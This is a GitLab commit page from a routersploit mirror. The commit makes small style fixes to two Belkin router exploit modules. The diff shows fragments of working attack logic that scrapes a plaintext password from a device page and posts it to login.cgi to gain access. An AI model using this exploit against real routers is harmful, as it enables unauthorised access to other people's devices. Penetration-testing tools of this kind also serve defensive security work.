Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
901ed47f
Commit
901ed47f
authored
8 years ago
by
BigNerd95
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Fixed flake8 violations
parent
49df5b75
master
…
v3.4.4
v3.4.3
v3.4.2
v3.4.0
v3.3.0
v3.2.0
v3.1.0
v3.0.0
No related merge requests found
Hide whitespace changes
Inline
Side-by-side
Showing
2 changed files
with
6 additions
and
7 deletions
+6
-7
auth_bypass.py
routersploit/modules/exploits/belkin/auth_bypass.py
+4
-5
g_n150_password_disclosure.py
...oit/modules/exploits/belkin/g_n150_password_disclosure.py
+2
-2
No files found.
routersploit/modules/exploits/belkin/auth_bypass.py
View file @
901ed47f
...
...
@@ -4,7 +4,6 @@ from routersploit import (
exploits
,
print_error
,
print_success
,
print_table
,
http_request
,
mute
,
validators
,
...
...
@@ -46,11 +45,11 @@ class Exploit(exploits.Exploit):
if
response
is
None
:
return
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
if
len
(
val
):
url
=
"{}:{}/login.cgi"
.
format
(
self
.
target
,
self
.
port
)
payload
=
"pws="
+
val
[
0
]
+
"&arc_action=login&action=Submit"
payload
=
"pws="
+
val
[
0
]
+
"&arc_action=login&action=Submit"
login
=
http_request
(
method
=
"POST"
,
url
=
url
,
data
=
payload
)
if
login
is
None
:
...
...
@@ -61,7 +60,7 @@ class Exploit(exploits.Exploit):
if
not
error
:
print_success
(
"Exploit success, you are now logged in!"
)
return
print_error
(
"Exploit failed. Device seems to be not vulnerable."
)
@mute
...
...
@@ -72,7 +71,7 @@ class Exploit(exploits.Exploit):
if
response
is
None
:
return
False
# target is not vulnerable
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
if
len
(
val
):
return
True
# target vulnerable
...
...
This diff is collapsed.
Click to expand it.
routersploit/modules/exploits/belkin/g_n150_password_disclosure.py
View file @
901ed47f
...
...
@@ -44,7 +44,7 @@ class Exploit(exploits.Exploit):
if
response
is
None
:
return
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
if
len
(
val
):
print_success
(
"Exploit success"
)
...
...
@@ -63,7 +63,7 @@ class Exploit(exploits.Exploit):
if
response
is
None
:
return
False
# target is not vulnerable
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
val
=
re
.
findall
(
'password
\
s?=
\
s?"(.+?)"'
,
response
.
text
)
# in some fw there are no spaces
if
len
(
val
):
return
True
# target vulnerable
...
...
This diff is collapsed.
Click to expand it.
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment